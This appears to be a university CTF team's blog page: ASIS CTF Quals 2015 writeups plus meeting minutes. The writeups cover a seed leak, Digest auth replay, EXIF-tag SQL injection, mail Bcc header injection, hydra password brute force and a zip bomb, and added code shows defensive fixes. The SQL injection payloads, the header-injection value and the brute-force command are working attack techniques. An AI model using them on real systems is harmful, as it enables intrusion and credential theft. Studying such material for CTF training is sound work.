Writeup ASIS CTF Quals 2015 – Saw this 1

Writeup by Adrian Müller, Tobias Pawelke
Challenge Name: Saw this 1
Value: 100 Points

Executing the binary presented us with a prompt asking for our name. Filling in this prompt printed the message “Welcome $name”, which becomes important later on. Next, the program asks for a lucky number between 0 and 100. After entering a number in that range, the game prompts for a random number of guesses. After entering arbitrary numbers, the program prints a failure message and exits.

[Image: Bild1]

Disassembling the binary revealed that upon entering the correct numbers, a text file not included with the binary would be printed. We assumed the flag to be in this file. The correct answers were randomly generated each run.

We found that the name string was stored in a global variable. While it was not possible to write past the bounds of the 64-byte char array, we discovered that the seed used by the pseudorandom number generator was stored directly behind the name string. We also found that the terminating NUL byte of the name string was omitted if the user filled all 64 characters, so that echoing the name also echoed the seed bytes that follow it.

[Image: Bild2]

Since the binary seed bytes were not readable in netcat, we used Wireshark to extract the random seed used on the remote host. We then debugged the binary locally, set the seed to the remote value, let the program generate the expected answers and read them out with the debugger. A further difficulty was that the remote host closed the connection after one minute. Entering the numbers on the remote host quickly enough presented us with the flag, together with a hint on how to obtain shell access for the second part of the challenge:

How can I call you? 1234567890123456789012345678901234567890123456789012345678901234
!come, 1234567890123456789012345678901234567890123456789012345678901234�
Choose your lucky number (1-100)! But choose wisely, your life depends on it: 0
I’ve thought of 4 numbers. If you guess them correctly, you are free!
Number #1: 169
Number #2: 194
Number #3: 121
Number #4: 76
YOU WON! You are free now!

Flag 1: ASIS{109096cca8948d1cebee782a11d2472b}
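The leak described above comes down to a fixed-size name buffer that loses its terminating NUL when completely filled, so that a later `printf("%s")` runs on into the seed stored right behind it. The following Python model is an added example, not code from the writeup or the challenge binary: it lays the 64-byte name and a 4-byte seed side by side in a byte buffer, reproduces the echo behaviour, recovers the seed from the echo, and shows the fixed variant that always leaves room for the terminator. The little-endian seed layout, the seed value and the use of Python's own PRNG as a stand-in for the binary's generator are assumptions.

```python
import random
import struct
from typing import List, Optional

NAME_LEN = 64  # size of the binary's global name buffer, as found in the writeup


def build_globals(name: bytes, seed: int, fixed: bool = False) -> bytearray:
    """Constructed model of the data section: the 64-byte name buffer is
    immediately followed by the 4-byte PRNG seed (little-endian assumed).
    fixed=False copies up to 64 bytes with no room for a terminator (the bug);
    fixed=True copies at most 63 bytes so the terminating NUL always fits."""
    buf = bytearray(NAME_LEN + 4)           # zero-filled, like a fresh .bss section
    limit = NAME_LEN - 1 if fixed else NAME_LEN
    name = name[:limit]
    buf[:len(name)] = name
    buf[NAME_LEN:] = struct.pack("<I", seed)
    return buf


def c_string(buf: bytes) -> bytes:
    """What printf("%s", name) emits: bytes up to the first NUL, or everything
    if no NUL is found before the end of the modelled memory."""
    end = buf.find(b"\x00")
    return bytes(buf) if end == -1 else bytes(buf[:end])


def leaked_seed(echo: bytes) -> Optional[int]:
    """Recover the seed from an echo that ran past the name buffer; None when
    the echo stopped inside the buffer or the seed itself contained a NUL."""
    tail = echo[NAME_LEN:NAME_LEN + 4]
    if len(tail) < 4:
        return None
    return struct.unpack("<I", tail)[0]


def expected_numbers(seed: int, count: int) -> List[int]:
    """Stand-in for the challenge's generator: Python's PRNG seeded with the
    leaked value. The real binary's generator is not known from the writeup;
    the point is only that a known seed reproduces the whole sequence."""
    rng = random.Random(seed)
    return [rng.randint(0, 255) for _ in range(count)]


if __name__ == "__main__":
    seed = 0x1A2B3C4D                      # constructed remote seed, no zero bytes
    echo = c_string(build_globals(b"1" * NAME_LEN, seed))
    print(f"echoed {len(echo)} bytes, leaked seed = {leaked_seed(echo):#x}")
    print("expected answers:", expected_numbers(seed, 4))
    echo_fixed = c_string(build_globals(b"1" * NAME_LEN, seed, fixed=True))
    print(f"fixed build echoes {len(echo_fixed)} bytes, leaked seed = {leaked_seed(echo_fixed)}")
```

Two details worth noticing: the leak only works because the seed happens to contain no zero byte (a NUL inside the seed truncates the echo and `leaked_seed` returns None), and the fix is not a bigger buffer but reserving the last byte for the terminator, which is what `fgets(name, sizeof name, stdin)` does and a raw 64-byte `read` does not.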

Minutes of meeting 4

Today a talk was given on hash cracking and cryptanalysis.

The slides are available here.

Minutes of meeting 3

Today Matthias presented the topic Return Oriented Programming.

You can download the slides here.

Writeup ASIS CTF Quals 2015 – Strange Authen

Writeup by Florian Ammon@Brutewoorse

Challenge Name: Strange Authen

Value: 225 Points

In this challenge we have an .htaccess-style authentication on the login page. After analyzing the start page, we have a look at robots.txt.

[Image: strange0]

There are two folders listed. To solve this challenge, we need to have a look at the /misc folder.

[Image: strange1]

A network capture is provided there. We open this file with Wireshark and look for anything interesting.

[Image: strange2]

We know we need the HTTP traffic to our site, so we can use the filter ‘http && ip.addr == 217.218.48.85’ to narrow down the packets.
We find a successful request to /login.php and one to /7he_most_super_s3cr3t_page.php. The second file sounds interesting, so we extract the data received for this page request via File -> Export Objects -> HTTP -> Packet 3081 -> Save.
After saving the file, we have a look at it and find this interesting line:

flor@debian:~/Downloads$ cat 7he_most_super_s3cr3t_page.php | grep ASIS
[...]
                Welcome factoreal, nice to see you again!<br />Woow! Great you found me! <!-- ASIS{flag_must_be_here} --><br /><a href="login.php?destroysession"> LogOut </a>

So, let's visit this page:

[Image: strange4]

It says we have to log in first. So let's try to replay the successful request from our capture file. To do so, we need the GET request: Packet 3079 -> Right Click -> Copy -> Bytes -> Printable Text Only

GET /7he_most_super_s3cr3t_page.php HTTP/1.1
Host: strangeauthen.asis-ctf.ir
Connection: keep-alive
Authorization: Digest username="factoreal", realm="this page for admin only, go out now!", nonce="554aed8c0b2d8", uri="/7he_most_super_s3cr3t_page.php", response="587bb0cf4968b88fdf00c8ae81ff8bf4", opaque="d073cc4342291e6270746b4675498022", qop=auth, nc=00000002, cnonce="bd65e746ecf4d7e7"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36
DNT: 1
Referer: http://strangeauthen.asis-ctf.ir/login.php
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8,fa;q=0.6,de;q=0.4
Cookie: PHPSESSID=hkgvkkaoq60v2bv613r2uouq22

We save this request as the file “get”, remove gzip from “Accept-Encoding” (so the response comes back uncompressed) and use netcat to send it to the server:

ctf@debian:~$ nc 217.218.48.85 80 < get
[...]
Welcome factoreal, nice to see you again!<br />Congratz! Great you found me! <!-- ASIS{004efe5ec5867811f4f13bc8f9921517} --><br /><a href="login.php?destroysession"> LogOut </a>
[...]

There it is!
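The replay works because the server accepts the captured `Authorization: Digest` header a second time with the same `nonce` and `nc=00000002`; RFC 2617 gives the server everything it needs to refuse that. The code below is an added example, not part of the writeup or the challenge: it parses the header shown above, computes the qop=auth/MD5 response, and implements the server-side bookkeeping (only server-issued nonces, strictly increasing nonce count per nonce) that makes a captured request unusable. The password `hunter2` and the `DigestVerifier` class are constructed for the example; the real response in the capture was of course computed with a password we do not have.

```python
import hashlib
import re
from typing import Dict

# Authorization header from the captured request shown above (copied from the writeup).
CAPTURED = (
    'Digest username="factoreal", realm="this page for admin only, go out now!", '
    'nonce="554aed8c0b2d8", uri="/7he_most_super_s3cr3t_page.php", '
    'response="587bb0cf4968b88fdf00c8ae81ff8bf4", '
    'opaque="d073cc4342291e6270746b4675498022", qop=auth, nc=00000002, '
    'cnonce="bd65e746ecf4d7e7"'
)

_PARAM = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')


def parse_digest(header: str) -> Dict[str, str]:
    """Split a Digest Authorization header into its parameters (quoted or bare)."""
    if not header.startswith("Digest "):
        raise ValueError("not a Digest header")
    return {k: quoted or bare for k, quoted, bare in _PARAM.findall(header[7:])}


def format_digest(params: Dict[str, str]) -> str:
    return "Digest " + ", ".join(f'{k}="{v}"' for k, v in params.items())


def _md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(p: Dict[str, str], method: str, password: str) -> str:
    """RFC 2617 response for qop=auth with the MD5 algorithm."""
    ha1 = _md5(f"{p['username']}:{p['realm']}:{password}")
    ha2 = _md5(f"{method}:{p['uri']}")
    return _md5(f"{ha1}:{p['nonce']}:{p['nc']}:{p['cnonce']}:{p['qop']}:{ha2}")


class DigestVerifier:
    """Server side: only nonces the server issued are accepted, and the nonce
    count must strictly increase per nonce, so a captured request cannot be
    sent twice. Passwords are held in clear only to keep the example short."""

    def __init__(self, users: Dict[str, str]):
        self.users = users
        self.issued: Dict[str, int] = {}   # nonce -> highest nc accepted so far

    def issue_nonce(self, nonce: str) -> None:
        self.issued[nonce] = 0

    def check(self, header: str, method: str = "GET") -> str:
        p = parse_digest(header)
        if p.get("nonce") not in self.issued:
            return "stale nonce"
        nc = int(p["nc"], 16)
        if nc <= self.issued[p["nonce"]]:
            return "replayed nonce count"
        password = self.users.get(p.get("username", ""))
        if password is None or digest_response(p, method, password) != p["response"]:
            return "bad credentials"
        self.issued[p["nonce"]] = nc          # consume this nc only after a valid proof
        return "ok"


if __name__ == "__main__":
    server = DigestVerifier({"factoreal": "hunter2"})   # constructed password
    server.issue_nonce("554aed8c0b2d8")
    params = parse_digest(CAPTURED)
    params["response"] = digest_response(params, "GET", "hunter2")
    request = format_digest(params)
    print("first use :", server.check(request))
    print("replay    :", server.check(request))
```

Note that the nonce-count check alone does not help if the application also grants access on the `PHPSESSID` cookie that was captured alongside the header, as the writeup's replay suggests; the session has to be bound to the authenticated connection (or expire quickly) as well.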

Writeup ASIS CTF Quals 2015 – Best Photo

Writeup by Florian Ammon@Brutewoorse

Challenge Name: Best Photo

Value: 175 Points

In this challenge we can upload files to a website. If we upload an image, the website prints its metadata.

[Image: bestphoto1]

If some SQL processing is going on behind the scenes, we might be able to inject SQL through a metadata tag. We choose exiftool to manipulate the metadata.

flor@debian:~/Downloads$ exiftool -documentname="sammax.png' OR '1'='1" sammax.png

[Image: bestphoto2]

Our test was a great success. So we try to comment out everything that follows our SQL injection:

flor@debian:~/Downloads$ exiftool -documentname="sammax.png' OR '1'='1' +--" sammax.png
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'X Resolution":"72","Y Resolution":"72","Resolution Unit":"inches","Y Cb Cr Posit' at line 1

It seems we have broken the SQL syntax. Let's see whether some brackets are needed, perhaps because it is an INSERT statement. We would also like to learn more about the table schema, so we try to read from the database via duplicate-key errors:

exiftool -documentname="sammax.png'), ((SELECT schema_name FROM information_schema.schemata LIMIT 1,1)) -- #" sammax.png
Column count doesn't match value count at row 1

This sounds pretty good. Let's try to add one more value:

flor@debian:~/Downloads$ exiftool -documentname="sammax.png'), ((SELECT schema_name FROM information_schema.schemata LIMIT 1,1),'123' ) -- #" sammax.png

This injection was successful. We see broken JSON as a result:

[Image: bestphoto3]

By doing this again, we get the following message:

Duplicate entry 'photo' for key 'PRIMARY'

Now we can browse through the information_schema database and maybe find some interesting entries. We have to upload the picture with our SQL twice, because we need the error that tells us the value already exists.

flor@debian:~/Downloads$ exiftool -documentname="sammax.png'), ((SELECT table_name FROM information_schema.tables WHERE table_schema='photo' LIMIT 1,1),'123' ) -- #" sammax.jpg
Duplicate entry 'tbl_flag_000' for key 'PRIMARY'

flor@debian:~/Downloads$ exiftool -documentname="sammax.png'), ((SELECT concat(col.table_name,'-',col.column_name) FROM information_schema.columns AS col WHERE table_name = 'tbl_flag_000' LIMIT 1), '100003') -- #" sammax.png
Duplicate entry 'tbl_flag_000-id' for key 'PRIMARY'

flor@debian:~/Downloads$ exiftool -documentname="sammax.png'), ((SELECT concat(col.table_name,'-',col.column_name) FROM information_schema.columns AS col WHERE table_name = 'tbl_flag_000' LIMIT 1,2), '100003') -- #" sammax.png
Duplicate entry 'tbl_flag_000-flag' for key 'PRIMARY'

flor@debian:~/Downloads$ exiftool -documentname="sammax.png'), ((SELECT flag FROM tbl_flag_000 LIMIT 1), '100003') -- #" sammax.png
Duplicate entry 'ASIS{908cd5cf7e6f337d232370ce7e0fd937}' for key 'PRIMARY'

That's it :)
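The whole chain above rests on two application mistakes: an EXIF value is concatenated into an INSERT statement, and the database driver's error text is shown to the uploader. The following example is added here and is not the challenge's code; it models both in a constructed SQLite schema (table and column names borrowed from the writeup, the flag is a placeholder) and puts the parameterized, generic-error version next to it. The payload is shaped like the writeup's exiftool tag, adapted to a two-column row; SQLite's duplicate-key error does not quote the offending value the way MySQL's "Duplicate entry" does, so the example shows the injected row directly instead.

```python
import json
import sqlite3
from typing import Dict, List

# Document Name tag modelled on the writeup's exiftool value; in this constructed
# schema the photo row has two columns, so the injected text first closes the
# current row with an empty second value before adding its own row.
PAYLOAD = "sammax.png', ''), ((SELECT flag FROM tbl_flag_000 LIMIT 1), '123') -- "


def fresh_db() -> sqlite3.Connection:
    """Constructed stand-in for the challenge database (flag value is a placeholder)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE photos (id TEXT PRIMARY KEY, meta TEXT)")
    con.execute("CREATE TABLE tbl_flag_000 (id INTEGER PRIMARY KEY, flag TEXT)")
    con.execute("INSERT INTO tbl_flag_000 (flag) VALUES ('ASIS{placeholder_flag}')")
    con.commit()
    return con


def store_vulnerable(con: sqlite3.Connection, doc_name: str, tags: Dict[str, str]) -> str:
    """The EXIF value is pasted into the statement and driver errors are returned
    verbatim, which is what let the writeup read schema names one at a time."""
    sql = f"INSERT INTO photos (id, meta) VALUES ('{doc_name}', '{json.dumps(tags)}')"
    try:
        con.execute(sql)
        con.commit()
        return "ok"
    except sqlite3.Error as exc:
        return f"error: {exc}"


def store_safe(con: sqlite3.Connection, doc_name: str, tags: Dict[str, str]) -> str:
    """Bound parameters keep the tag a literal; the uploader only sees a generic message."""
    try:
        con.execute("INSERT INTO photos (id, meta) VALUES (?, ?)", (doc_name, json.dumps(tags)))
        con.commit()
        return "ok"
    except sqlite3.IntegrityError:
        return "upload rejected"
    except sqlite3.Error:
        return "upload failed"


def photo_ids(con: sqlite3.Connection) -> List[str]:
    return [row[0] for row in con.execute("SELECT id FROM photos ORDER BY id")]


if __name__ == "__main__":
    tags = {"Document Name": PAYLOAD, "X Resolution": "72"}
    con = fresh_db()
    print("vulnerable:", store_vulnerable(con, PAYLOAD, tags), photo_ids(con))
    print("vulnerable again:", store_vulnerable(con, PAYLOAD, tags))
    con = fresh_db()
    print("safe:", store_safe(con, PAYLOAD, tags), photo_ids(con))
```

With the concatenated statement the photos table ends up with a second row whose primary key is whatever the subquery returned; with bound parameters the entire tag, quotes and comment marker included, is stored as one literal id and no subquery runs. Returning a fixed message instead of `str(exc)` removes the error channel the writeup used, but only the parameter binding removes the injection itself.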

Minutes of meetings 1 and 2

On 4 May, David and Axel presented the topic “Introduction to Reverse Engineering”.

The slides can be found here. You can download the “Hello World” assembler program here.

On 11 May, Florian presented the topic “XSS”.

The slides can be found here.

Writeup ASIS CTF Quals 2015 – Secret Message

Writeup by Florian Ammon@Brutewoorse

Challenge Name: Secret Message

Value: 150 Points

First of all, we have a look at the functionality the vulnerable web service offers. As we can see, there is a contact form and a login. We send a message through the contact form to see how it works.

[Image: secmes0]

There is JavaScript validation of the entered data. After solving the captcha and sending our message, we get a success message.

[Image: secmes1]

Now we want to try sending a message with some invalid data. To do that, we need to know the URL the data is sent to, and we have to obtain the captcha. We look at the source for this information:

[Image: secmes2]

[Image: secmes3]

We notice that the mail is sent with the PHP X-Mailer, as mentioned in the source. Now we request a new captcha:
flor@debian:~/write-up/secmes$ curl -sv http://secretmessage.asis-ctf.ir/captcha_code_file.php?rand= > captcha
[…]
< Set-Cookie: PHPSESSID=3go94lp40o30sca68e50ud6ck2; path=/
[…]

[Image: secmes4]

Within this request we also got the PHPSESSID we have to use for the further steps.

We have a look at the PHP documentation for mail():

$empfaenger = 'niemand@example.com';
$betreff = 'Der Betreff';
$nachricht = 'Hallo';
$header = 'From: webmaster@example.com' . "\r\n" .
    'Reply-To: webmaster@example.com' . "\r\n" .
    'X-Mailer: PHP/' . phpversion();
mail($empfaenger, $betreff, $nachricht, $header);

The idea is to add ourselves as Bcc; maybe there is a secret inside the mail. Because we will send our request with curl, we write our data into a file first and then send the request:

flor@debian:~/write-up/secmes$ touch mail
flor@debian:~/write-up/secmes$ echo jdoe@mail.tld >> mail
flor@debian:~/write-up/secmes$ echo Bcc: my@mail.tld >> mail
flor@debian:~/write-up/secmes$ curl --cookie PHPSESSID=3go94lp40o30sca68e50ud6ck2 --data-urlencode name=jdoe --data-urlencode email@mail --data-urlencode message=gotcha --data-urlencode submit=Submit --data-urlencode 6_letters_code=h36cpr -v http://secretmessage.asis-ctf.ir/contact.php | grep Success

[…]

> Cookie: PHPSESSID=3go94lp40o30sca68e50ud6ck2

Success! Your message has been sent successfully.
The mail should be sent to us.

[Image: secmes5]

The mail we received mentions the admin's mail address. Now we try a wordlist attack against the login; we choose ‘rockyou.txt’.

flor@debian:~/write-up/secmes$ hydra secretmessage.asis-ctf.ir http-form-post "/login.php:email=^USER^&password=^PASS^&submit=:invalid" -l awareneo@gmail.com -P /usr/share/wordlists/rockyou.txt -t 10 -w 30 -o output.txt

flor@debian:~/write-up/secmes$ cat output.txt
# Hydra v7.6 run at 2015-05-10 17:07:24 on secretmessage.asis-ctf.ir http-post-form (hydra -l awareneo@gmail.com -P /usr/share/wordlists/rockyou.txt -t 10 -w 30 -o output.txt secretmessage.asis-ctf.ir http-post-form /login.php:email=^USER^&password=^PASS^&submit=:invalid)
[80][www-form] host: 217.218.48.85 login: awareneo@gmail.com password: mustang

We got our password. Now we have to log in.

[Image: secmes6]

[Image: secmes7]

We can see an encoded message from the NSA. Maybe it's Base64 encoded:

flor@debian:~/write-up/secmes$ echo QVNJU3tkNGZmZGFkNDU3NDFmODFiOWIzYjcwOThkZDc5MDMxYX0K > flag
flor@debian:~/write-up/secmes$ base64 -d flag
ASIS{d4ffdad45741f81b9b3b7098dd79031a}

Congrats, we got it!
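The Bcc trick works because the contact form splices the submitted address into the `$header` string handed to `mail()`, so a newline in the field starts a new header line. The example below is added here and is not the challenge's code: it models that header construction, shows which header names a mail transfer agent would see for the value from the file "mail" above, and puts a validator next to it that rejects CR/LF before the value ever reaches a header. The address pattern, the `X-Mailer` version string and the set of expected headers are constructed for the example.

```python
import re
from typing import List

# The value the writeup put into the "email" field: an address followed by a
# newline and an extra header line (contents of the file "mail", reconstructed).
INJECTED_EMAIL = "jdoe@mail.tld\nBcc: my@mail.tld"

# Deliberately simple address shape; the point is the control-character check.
_ADDRESS = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}")


def build_headers_naive(email: str) -> str:
    """Constructed model of the contact form: the submitted address is pasted into
    the $header string handed to mail(), exactly as in the PHP manual example."""
    return "From: " + email + "\r\n" + "Reply-To: " + email + "\r\n" + "X-Mailer: PHP/5.x"


def header_names(raw_headers: str) -> List[str]:
    """Header field names an MTA would see; splits on CRLF and on bare LF."""
    return [line.split(":", 1)[0].strip()
            for line in re.split(r"\r?\n", raw_headers) if ":" in line]


def is_safe_address(value: str) -> bool:
    """Reject anything that could start a new header line, then require one address."""
    if any(ch in value for ch in "\r\n\x00"):
        return False
    return _ADDRESS.fullmatch(value) is not None


def build_headers_safe(email: str) -> str:
    if not is_safe_address(email):
        raise ValueError("invalid e-mail address")
    return build_headers_naive(email)


def smuggled_headers(email: str, expected=("From", "Reply-To", "X-Mailer")) -> List[str]:
    """Detection view: header names the naive build would emit that the form never intended."""
    return sorted({h for h in header_names(build_headers_naive(email)) if h not in expected})


if __name__ == "__main__":
    print("headers seen by the MTA:", header_names(build_headers_naive(INJECTED_EMAIL)))
    print("smuggled:", smuggled_headers(INJECTED_EMAIL))
    print("validator accepts injected value:", is_safe_address(INJECTED_EMAIL))
```

Because the address is used twice (From and Reply-To), the injected Bcc line appears twice as well; `smuggled_headers` de-duplicates so a log entry names each unexpected header once. Rejecting the request is preferable to stripping the newlines, since a silently "cleaned" value would still hide the fact that someone probed the form.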

Writeup ASIS CTF Quals 2015 – Keka Bomb

Writeup by Matthias Hanreich@Brutewoorse

Challenge Name: Keka Bomb

Value: 75 Points
As usual for this CTF, we get an XZ-compressed archive, which can be extracted with

7z e keka_bomb_9e0f1863259c578f3231b5cfbc10e258

What do we get? Another 7-zip archive. Taking a look at it with

7z l keka_bomb_9e0f1863259c578f3231b5cfbc10e258~

shows 16 additional 7-zip archives of 4 GB each.

[Image: 01_Overview]
Wait, what? 67 GB within a 10 KB file? That sounds a lot like a zip bomb (not surprisingly, as the name of the challenge is Keka Bomb; Keka is an archiving tool for the Mac).
A characteristic of zip bombs is that they contain nested archives with big files to overflow the victim's hard disk.

So, what shall we do? We don't know the nesting level, and each archive per level contains another 67 GB, so extracting all archives is no option. To achieve high compression rates, the archives have little or no entropy and often consist of one single repeated character, while the flag itself has higher entropy due to its different characters. Therefore we can use a 7z function to compare the CRC sums of all files within an archive and see whether we can spot a difference.

7z l -slt keka_bomb_9e0f1863259c578f3231b5cfbc10e258~ | grep -E "Path|CRC"

[Image: 02_CRC013]

As we can see, we have one archive with a different CRC sum. Let’s extract it with

7z e keka_bomb_9e0f1863259c578f3231b5cfbc10e258~ 013.7z

and investigate it again. We repeat these steps until we reach a final file.

7z l -slt 013.7z | grep -E "Path|CRC"

[Image: 03_CRC0009]

7z e 013.7z 0009.7z
7z l -slt 0009.7z | grep -E "Path|CRC"

[Image: 04_CRC0000007]

7z e 0009.7z 0000007.7z
7z l -slt 0000007.7z | grep -E "Path|CRC"

[Image: 05_CRC0000000008]

7z e 0000007.7z 0000000008.7z
7z l -slt 0000000008.7z | grep -E "Path|CRC"

[Image: 06_CRCbomb_08]

After four levels of nesting we find the final file bomb_08. A quick search with

strings bomb_08

shows us the flag:

ASIS{f974da3203d155826974f4a66735a20b}
[Image: 07_FLAG]
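The manual `7z l -slt ... | grep -E "Path|CRC"` loop above can be turned into a small triage script that never extracts anything: parse the technical listing, flag the entry whose CRC differs from the filler copies, and compute the declared-size to packed-size ratio that gives a bomb away before anything touches the disk. This is an added example, not part of the writeup; the listing it parses is constructed to mimic the writeup's archive (16 entries of 4 GiB, one of them, 013.7z, with a different CRC), the CRC values and the 10 KB packed size are made up, and the ratio threshold is a chosen constant.

```python
from collections import Counter
from typing import Dict, List


def build_sample_listing() -> str:
    """Constructed text in the 'Key = Value' shape of '7z l -slt'. Packed Size is
    only printed for the first entry of a solid block, as 7z does."""
    blocks = ["Path = keka_bomb_9e0f1863259c578f3231b5cfbc10e258~\nType = 7z\nSolid = +\n\n----------"]
    for i in range(16):
        crc = "5D0E77B3" if i == 13 else "9A2F4C11"        # made-up CRCs
        packed = "10240" if i == 0 else ""
        blocks.append(f"Path = {i:03d}.7z\nSize = 4294967296\nPacked Size = {packed}\nCRC = {crc}")
    return "\n\n".join(blocks) + "\n"


def parse_slt(text: str) -> List[Dict[str, str]]:
    """Parse blank-line separated records; keeps only file entries (records that
    carry a CRC), which drops the archive's own header block."""
    records: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                records.append(current)
                current = {}
            continue
        key, sep, value = line.partition(" =")
        if sep:
            current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return [r for r in records if "CRC" in r]


def crc_outliers(entries: List[Dict[str, str]]) -> List[str]:
    """Paths whose CRC differs from the dominant one, i.e. the member that is not
    just another copy of the filler data."""
    counts = Counter(e["CRC"] for e in entries)
    common, n = counts.most_common(1)[0]
    if n < 2:
        return []            # no dominant CRC, nothing stands out
    return [e["Path"] for e in entries if e["CRC"] != common]


def expansion_ratio(entries: List[Dict[str, str]]) -> float:
    """Declared unpacked bytes divided by packed bytes across all members."""
    unpacked = sum(int(e["Size"]) for e in entries if e.get("Size"))
    packed = sum(int(e["Packed Size"]) for e in entries if e.get("Packed Size"))
    return float("inf") if packed == 0 else unpacked / packed


BOMB_RATIO = 1000.0          # chosen threshold for this example


def looks_like_bomb(entries: List[Dict[str, str]]) -> bool:
    return expansion_ratio(entries) > BOMB_RATIO


if __name__ == "__main__":
    members = parse_slt(build_sample_listing())
    print("members:", len(members), "ratio:", f"{expansion_ratio(members):.0f}")
    print("bomb?", looks_like_bomb(members), "odd one out:", crc_outliers(members))
```

To run it against a real archive, feed `parse_slt` the output of `7z l -slt <archive>` instead of the constructed listing; the CRC heuristic only makes sense when most members are identical filler, which `crc_outliers` guards against by returning nothing when no CRC occurs at least twice.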

CTF Kickoff Meeting SS2015

The kickoff meeting of the CTF team took place last Monday (20.04.2015). After Florian introduced our team and the planned schedule for this summer semester, followed by a talk for CTF beginners, five challenges from this year's CTF event were solved by their respective authors.

  • Florian – Kostenlose Kekse
  • Johanna – Salt & Pepper
  • Daniel – Verschachtelt
  • Fabrice – Wer hats erfunden
  • David – Gute Argumente

If you missed the kickoff meeting, just have a look at Florian's slides and take a look at our wiki (login for all registered participants with their h_da st-account). There you will find a collection of links that should make it easier to get started, and in the next few days also the write-ups of our own challenges. If you still have questions, send us a mail or drop by at one of our meetings; you are very welcome!
This semester we meet every Monday at 19:30. The next meeting takes place on 4 May in room 0.13 in building D14 of the university. The topic of the first talk will be ‘An Introduction to Reversing’.

Join in the summer semester 2015!

The summer semester starts soon and we are again looking for new members for our team.

All information can be found on the poster:

[Image: CTFposter]

Download the poster as PDF: 2015-CTFposter

CTF Challenge

At the link https://ucs.fbi.h-da.de/challenge you can test yourself and see whether the CTF team is the right thing for you!

[Image: challenge]

We would be happy to see some of you with us soon!